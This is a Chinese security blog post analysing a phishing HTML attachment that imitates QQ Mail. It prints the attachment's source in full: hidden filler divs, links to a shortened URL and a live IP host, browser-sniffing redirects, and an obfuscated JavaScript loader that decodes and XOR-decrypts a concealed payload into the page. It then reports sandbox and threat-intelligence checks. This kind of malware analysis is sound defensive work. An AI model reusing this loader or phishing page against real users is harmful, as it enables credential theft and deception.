原文来源 :系统安全运维
0x01、前言
html文件,直接使用txt打开。用vscode稍微代码格式化整理了下:?<div style="LINE-HEIGHT: -9999px; DISPLAY: inline; FLOAT: left; HEIGHT: 0px; CLEAR: both; OVERFLOW: hidden">(hthssdfQgdqqfgDFGERTFDFSDTYNYSADWEVBADSDSFGSDASFsDSADDSADdfgDSAfADASDADgsdSDTGRFDSJHGFDGTHGHDSADGFDSFDHGFDASDADSSGHGFDSFDSSHGFRFSDFFGHfgdfghSADsdfhggft)</div><p><a href="https://url.cn/5tkBqVA" target="_blank"><img src="https://s1.ax1x.com/2018/12/11/FYntoD.png" height="250px" width="250px" /></a></p><div style="LINE-HEIGHT: -9999px; DISPLAY: inline; FLOAT: left; HEIGHT: 0px; CLEAR: both; OVERFLOW: hidden">(grjdfdfghSDFxgdfRDFTsdDTYYNFGHJfgVBDSWESSDASDFDFGDFRADDSADASDADHASDASDASDAShjFGFGHsdfdfghmdfHGFDGHGFHGFDGSADASDFDDSADSSGFDSGFDSGHFDSFDSDSFvDSADghjjxj)</div><includetail></includetail><div><includetail><div><font size="6" color="red" face="??????"><a href="https://url.cn/5tkBqVA" target="_blank">���½����鿴����</a></font></div></includetail></div>
虚拟机测试逻辑
首先,直接打开该html文件
哎呀,这个做的有点像哦,可是你这种直接 url 都懒得伪装的真的好么?无力吐槽
download这个页面
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><!-- saved from url=(0026)http://154.88.117.3/pc.php --><!DOCTYPE html PUBLIC "" ""><HTML lang="zh-cn"><HEAD><META content="IE=10.000" http-equiv="X-UA-Compatible"><META http-equiv="Content-Type" content="text/html; charset=utf-8"><META name="viewport" id="viewport"content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"><TITLE> </TITLE><LINK href="https://mail.qq.com/zh_CN/htmledition/i mages/favicon/qqmail_favicon_16h.png" rel="shortcut icon"><META name="GENERATOR" content="MSHTML 10.00.9200.16384"></HEAD><BODY><SCRIPT>window.onload = function () {//application/vnd.chromium.remoting-viewer 可能为360特有var is360 = _mime("type", "application/vnd.chromium.remoting-viewer");if (isChrome() && is360) {window.location.href = './tips.php';}}//检测是否是谷歌内核(可排除360及谷歌以外的浏览器)function isChrome() {var ua = navigator.userAgent.toLowerCase();return ua.indexOf("chrome") > 1;}//测试mimefunction _mime(option, value) {var mimeTypes = navigator.mimeTypes;for (var mt in mimeTypes) {if (mimeTypes[mt][option] == value) {return true;}}return false;}</SCRIPT><DIV class="main" style="height: 500px; overflow: hidden; padding-top: 1100px;"><P>ZXE!</P><P>vA VZhGQ0r LGE!</P><P>C,<BR>U3NlWi0 La1.</P><P>pRcWFFb lJ5TShY D.</P><P>HhUcTNF UXUjVis jW1.</P><P>tRY1.</P><P>QMA C,<BR>FWUXltc UR9MnUO Il9yRW9 xC,<BR>lZWTyMM A FYGB 3xsfhMB C,<BR>GwAfX1.</P><P>1.</P><P>A VQpUA A odXJbbA sVX1.</P><P>B bWFA A C,<BR>WIB eXdzE1x D.</P><P>zE0x4yb A F9flhfV jZTWA V2V1.</P><P>R4bSB GeWUjWC ,<BR>E!</P><P>NQwB 5fHILPi JrRlZUU wVzE1xJ XYA KHUJW1.</P><P>ZUB UFRXA 4GLyB A UFJzE0x XB kA JghMUHF cQG01.</P><P>WFA D.</P><P>XwFGb20 SVldxN1 .</P><P>UGJwJca mNzE1xF QcIfwZV bglGeA h1.</P><P>QgMA D.</P><P>V98cVF6 f1.</P><P>sJE!</P><P>A MJUFB VTXE!</P><P>XA FdvX1.</P><P>ULXA N7OWVfA nE!</P><P>JXFRuB V5RcQ0P A yxiQ2kG C,<BR>RA GVnA A fXF6XW4 MclgsWG 0C,<BR>eX0oA H1.</P><P>lFhgsMG ZE!</P><P>fXdbVC,<BR>0tXUZuc WJceA h2Ti9Id kRQfRJW UnE!</P><P>3E!</P><P>ThWWwdz E2xXXFT Ki1.</P><P>7A ntA cllVU09 B A lhXVHxD .</P><P>IE!</P><P>ZzE1xch IGOwkKT mpzE0xZ horD.</P><P>HhB e0B yWm42eU U7A XJFUW5U WnxfIB YtHXFA aWNiC,<BR>A UyD.</P><P>Fh4bkhf bQ9mA Sh2fQJW cQYGenE !</P><P>7FwA KYkNTB lxVPjFW UXltakR SJURQLW pcX2xUF UFXdVA JA SxxW2lsegsGC,<BR>Hdae1.</P><P>B yRlVTA lsoegh4 eVQZR2k E!</P><P>WQYHHXF eaWNzE1 xE!</P><P>T5Wc0B QbgVYez E0xZbQz E0xhlXF 96VzE0x dIUXUJD .</P><P>gYsYUB zE2xXQg VB jJzE2xR lZ6B UtUMgJd A wA IRVB UC,<BR>VdiB lUXA yxhQ1.</P><P>JzE0xZg gFPWtGV gsE!</P><P>RVY2B l87A G5JeQsZ R2kE!</P><P>WRcB PHVD.</P><P>aWNcE!</P><P>C,<BR>hWf05Wb nZD.</P><P>VScORA MA XE!</P><P>VtC,<BR>zE0xNda VsnUA A sYVF9Xn E!</P><P>UB SYMQVZU U0N4U1.</P><P>9bA GVcXFF9 D.</P><P>lZzE1xY iA WA SxUA Hl8VB MzE1xLW tZe1.</P><P>B xSnklZU A E!</P><P>dktUV24 nSGkE!</P><P>D.</P><P>RQtD.</P><P>XIHfXxy Vy0ifwd QfghUeh t1.</P><P>QA R2S1.</P><P>RXbidIa QQNFC,<BR>4zE0xeU FUfGIVB jFWUXlT ckRSJUR QOF9zE1 xWVQLB UhRBTcUOC,<BR>cC,<BR>TVFsQA 8rD.</P><P>HhPen1.</P><P>iRFIidk 8sdnpE!</P><P>UHojC,<BR>HB fVFE!</P><P>4V1.</P><P>8GUWND.</P><P>B A E!</P><P>ce1.</P><P>1.</P><P>VYX5E!</P><P>VSZxA i5bekZX C,<BR>1.</P><P>RdfE!</P><P>8jFgB XfUdUc1 .</P><P>wVB g9WUW1.</P><P>ueklVU0 8GB XVtB HxzE1xG V1.</P><P>pWD.</P><P>B XKyB 2B lN8V1.</P><P>QtLWtA V31.</P><P>fVHo1.</P><P>eUA E!</P><P>dktUVH4 3QWkE!</P><P>C,<BR>VE!</P><P>tD.</P><P>XJPf3xy VyscewV VbmID.</P><P>ViVYUC,<BR>xmUE!</P><P>RQfRJWa lsnC,<BR>wNWV05S B 2YWPiYI XFYLSE!</P><P>VUC,<BR>1.</P><P>hQKA B zE1xW2x tE!</P><P>lZqW1.</P><P>gYOC,<BR>NlTnxse gszE1xI lUHV0Nf VHg5dQM oegh4fA sFQ1.</P><P>JbA gYHHXE!</P><P>E!</P><P>UWNiUwU hVlF5U1 .</P><P>tE!</P><P>VC,<BR>lQA C,<BR>h1.</P><P>C,<BR>VtWVA VB UVwOB i8ncV9U bGIVLS0 JfX0LSE !</P><P>FtD.</P><P>FNcA kt6B HxzE1xK 1.</P><P>lqB B UPA QkKB lJZYVUt JndbblR pB H4mX1.</P><P>sA ZVxcUX0 OVnxyD.</P><P>RYHIE!</P><P>B QaVkJGj 4ib094Y XpbbSZb B gJIV1.</P><P>R7cSMFe n5RKitW W0ZRc0Q MA Rx7B VVuYgNW JVhQLFh TRFZxB gZ6cQkN A zE0xNXWFRwXwQq IWtB UX1.</P><P>D.</P><P>VFUmW0I 7YQlcb2 4NX1.</P><P>JzE1xMF crIGIHU 3xXVC,<BR>0ic1.</P><P>5tC,<BR>0RdVA wOB gNfaQV8 eixJfXI 7D.</P><P>D.</P><P>gjagB 5c3oVB whrWldT X1.</P><P>R6JURQO F8B Sm9zE1x N0hzE2x bisJOC,<BR>NfB lNOXwQq LXsC,<BR>e0B yWVVTT0E!</P><P>C,<BR>WFdUfA s7XGlcE !</P><P>gY4C,<BR>QpC,<BR>VHcB GQU9SVp 7UHFLeQ 91.</P><P>A y5LegNv YQkB f2E!</P><P>nE!</P><P>gMzE0xV 0JzE2xX XIJPjIM B m5heQRz E1xJgZf A l9cQ1.</P><P>dQUA FRB SB XKyB 2B lN8V1.</P><P>QtImtGV wpyQG45 XA E!</P><P>odXJA VwsvQ3p zE1xUSo rVnkGVH xiFQY2e wF9cVRD .</P><P>bSllWC,<BR>5beUp6b SNGVnIS B gA zE0xdU5 qB lwWKwx4 QX1.</P><P>zE1xdgJ TJg9QB 2NXWWxX NwFXcVg VKyd9WV FsXA 0zE1xHH sB fXFUQ20 pZVguW3lKem0jR lZyE!</P><P>gYB IwpNUWx iE!</P><P>wZXD.</P><P>QB 9cXpfVS ZxB wB qYl96QC ,<BR>NFam4rD .</P><P>wMzE0xB 0NUcwkU Kwx4Tnp hcgd4GH VB B V9uSm9U GUdXTA 4GA yNfXGpz E0xZhYtLQl9fQt 6A lMpZUE!</P><P>D.</P><P>YXlZUFQ sQnp1.</P><P>LwgGPGE !</P><P>HUgYA B C,<BR>1.</P><P>XY0B XVFRfUy l1.</P><P>B D.</P><P>txegR8f i9HUXFY GC,<BR>0Ncl1.</P><P>9XmFRKT FeTHtA ckB WNgJbLW VQX1.</P><P>RuB V5Xcg4G LzE0xB hQFVwQw QzE1xC,<BR>A B D.</P><P>UHoB SVY5R1.</P><P>suW3lLe 3E!</P><P>jB XxPIxY7 M2FcUWM FD.</P><P>SsMeE!</P><P>56YXIHf iVyQA J6X1.</P><P>RTaA 5balg3U QYjC,<BR>kN5d35V PRx7A X1.</P><P>zE1xakB VU3E!</P><P>HLlt6Sl RuB V5XchIG A D.</P><P>N1.</P><P>TmoGXB YoPXNGb gtYA 3gIdkMs ZnpE!</P><P>UHojC,<BR>HB fLwgGPG E!</P><P>HUgYA B C,<BR>1.</P><P>XY0B XVFRfUy l1.</P><P>B D.</P><P>txegR8f jtC,<BR>UQQnUS0 NcURqY2 pTKxx7Q m1.</P><P>hel1.</P><P>WNgND.</P><P>A 3VuXlF9 D.</P><P>lZzE2xY iQWA SxUUFZl X1.</P><P>soVncGU W5IX2cG WA 87XwFKV 2ojQWly UQg4C,<BR>QpOUmd5 B A YybwZVf glYZzE0xJ9QA MB dgN8UC,<BR>A acFE!</P><P>KWTgjXw V5c1.</P><P>wIND.</P><P>ZzE0xRV YLVE!</P><P>VzE1xC,<BR>HVdA 3VzE1xS VZD.</P><P>UVhRcVg PA B 1.</P><P>6HGB 3C,<BR>QgFPWA dd1.</P><P>5bC,<BR>20mWwUo dVRYZWo rX1.</P><P>IE!</P><P>E!</P><P>Q8rD.</P><P>gd8c2Vb WwA yTlFVbm E!</P><P>KfgxPRT tfXFhWQ C,<BR>gacFE!</P><P>KKyE!</P><P>wS0RRYA QoJzE0x RSfHdtS E!</P><P>NVD.</P><P>3UGB XF6WVdz E1xJ0tQ TFE!</P><P>IA yND.</P><P>RmpNeQQ GC,<BR>H9C,<BR>bm0A WlM5eVs C,<BR>W3FUbGE !</P><P>3A VE!</P><P>E!</P><P>LxcA PHFE!</P><P>amxiD.</P><P>zE0xQ2c 0B uVGlafi J1.</P><P>TjtqfgJ UYStdaX UjFjs8Y QdqbHoW ND.</P><P>ZzE0xU3 hXQwJ7J X5A B 2FxVFcL VE!</P><P>FRWD.</P><P>sJA C,<BR>NfXGB nehkzE1 xPWtyUG FzE1xA 1.</P><P>VTB mA 4ZUB D.</P><P>b34NA VZlB g9ULxgE !</P><P>B ngGN1.</P><P>E!</P><P>UC,<BR>1.</P><P>wB D.</P><P>3dGA jhgW1.</P><P>QHa1.</P><P>wA VggC,<BR>B mwiLygd WA B 5XXIUB iJzE2xX G5uWE!</P><P>VVJmVbA lgIWmB vKV1.</P><P>ZA QcPD.</P><P>S1.</P><P>2QQVbXS 9RFUA A eB JdcE!</P><P>UUUkISY XE!</P><P>Ydl4Ke3 B iFhcA I1.</P><P>gcc1.</P><P>NbKScxQ UVVbQR4 dD.</P><P>B cfSJmQE !</P><P>NXVyMA V3UjC,<BR>wA jdU1.</P><P>TTgA KB SJJR25A eVRTKVt A O2YIWlZ zE1xJ0t QB QUXA QliXnlz E0xB QsGMmwPfVdyW1.</P><P>RSel4od QlbUH4Z XVFbB VE!</P><P>D.</P><P>IA NefV5xC ,<BR>i0tc1.</P><P>pXYWZD.</P><P>VA xhXC,<BR>h1.</P><P>A UZUblQD .</P><P>amE!</P><P>ZE!</P><P>TggA 1.</P><P>5TB mZTNVZv TFB zE1xC,<BR>UdhD.</P><P>HFE!</P><P>A GVqQ1.</P><P>FxC,<BR>l55HQgX Fk9aHFs fURcLTl xeRkxnd UcE!</P><P>YE!</P><P>E!</P><P>JR1.</P><P>1.</P><P>UUmoC,<BR>QXxPKA YrI3UGV HMJC,<BR>QZWc09u bn4D.</P><P>ZzE0xJ9 QTtfYVp 8cSNC,<BR>amE!</P><P>vD.</P><P>QMjC,<BR>kRqc2Ya ND.</P><P>Z1.</P><P>WUYOVlx B E!</P><P>WdbC,<BR>VNgXlJI C,<BR>1.</P><P>9eWTMzE 0xNwFkQ VhB VQQD.</P><P>NnA dd1.</P><P>5beXQ1.</P><P>QE!</P><P>E!</P><P>D.</P><P>dVMYdl4 Ke2N1.</P><P>WFA A IA d8c2VbW zE0x0Lb wZQfglG fiZbXD.</P><P>FhclxUV A lD.</P><P>UnUoB gA JdUNqYA A KB 1.</P><P>ZvX1.</P><P>ZuXA NzE1xC,<BR>wB ZD.</P><P>FB OQ1.</P><P>hgOA lzE2xB C,<BR>tQB ixhQVJe B C,<BR>gnMU5A bn5cA WcGWH0x dWpD.</P><P>UVA jQWlyUQ g7C,<BR>mUHVHMJ Fy0PD.</P><P>X1.</P><P>3aFsLbS ZbB Sh1.</P><P>VFhlait fUm4ND.</P><P>zE0xgde hxzE0xU 1.</P><P>spJzE0x FB TFdzE1x dkZzE1x JltcMWF yB WxA KFZjQwA bE!</P><P>ytkcFp7 UTQXKm4 C,<BR>X3ZnY0M bQE!</P><P>E!</P><P>C,<BR>A XpbV1.</P><P>NVenB nC,<BR>isyLH1.</P><P>A aWME!</P><P>B A UyaA 99VGpFV A xTWwV6e gB veigaB lRKOFco QnA FVRskUV N6dA MOSVVnI g5NAnVzE1xR mVeD.</P><P>ntwYhYX OC,<BR>NfB WB TXyk0Jg B dVWFpGH QLQE!</P><P>E!</P><P>7XwFKV2 1.</P><P>VegzE3x zE3x59a 1.</P><P>36aabd3 7040cde 9649037 a77a283 </P></DIV><SCRIPTtype="text/javascript">(function () { function be4(s) { var c, d, e, h, j, n, r, i = 0, v = '', t = '', o = 'indexOf', q = 'charAt', w = 'charCodeAt', f = String.fromCharCode, l = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; l += '0123456789+/='; while (i < s.length) { c = l[o](s[q](i++)); d = l[o](s[q](i++)); e = l[o](s[q](i++)); h = l[o](s[q](i++)); j = (c << 2) | (d >> 4); n = ((d & 15) << 4) | (e >> 2); r = ((e & 3) << 6) | h; v = v + f(j); if (e != 64) { v = v + f(n) } if (h != 64) { v = v + f(r) } } c = d = i = 0; while (i < v.length) { c = v[w](i); if (c < 128) { t += f(c); i++ } else if ((c > 191) && (c < 224)) { d = v[w](i + 1); t += f(((c & 31) << 6) | (d & 63)); i += 2 } else { d = v[w](i + 1); e = v[w](i + 2); t += f(((c & 15) << 12) | ((d & 63) << 6) | (e & 63)); i += 3 } } return (t) } var i = 0, t = '', p, e = document.getElementsByClassName('main').item(0); if (!e.style) return; e.style.height = '0'; e.style.display = 'none'; s = e.innerHTML; s = s.replace(/<.+?>/g, '').replace(/[^A-Za-z0-9\+\/\=]/g, '').replace(/zE([0-3])x/g, function (a, b) { return ['z', '+', '/', '='][b] }); p = s.slice(-32); s = s.slice(0, -32); s = be4(s); for (i = 0; i < s.length; i++)t += String.fromCharCode(s.charCodeAt(i) ^ p.charCodeAt(i % 32)); document.write(be4(t)); s = t = p = '' })();</SCRIPT></BODY></HTML>
发现了一段混淆的 js,几经尝试没法去除混淆。算了,直接调试吧
js中定义了一个函数be4,几经尝试,就是base64解密函数
js代码的意思,就是将上面那些看起来杂乱无章的恶意负荷经过一系列的操作解密出来然后 document.write 到页面中。注册表有大量的更改,经分析,无敏感更改
ip,切换代理爆破目录也被ban了虽然说页面做的很垃圾,但是这防护做的够精啊,也是,根本不用考虑用户体验,广撒网形式的钓鱼不怕误ban
云沙盘分析
再来看网络异常行为,发现了几个 tcp 连接使用360威胁情报中心去查询这些
ip ,发现一个高危ip
结论
侵权请私聊公众号删文
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650527856&idx=2&sn=b1da53deb6800e1de7b609de0218a79a&chksm=83babd94b4cd3482907e58b529e3f201a402fe893e0fad6a6109be0463f3f17ae70c70536824#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh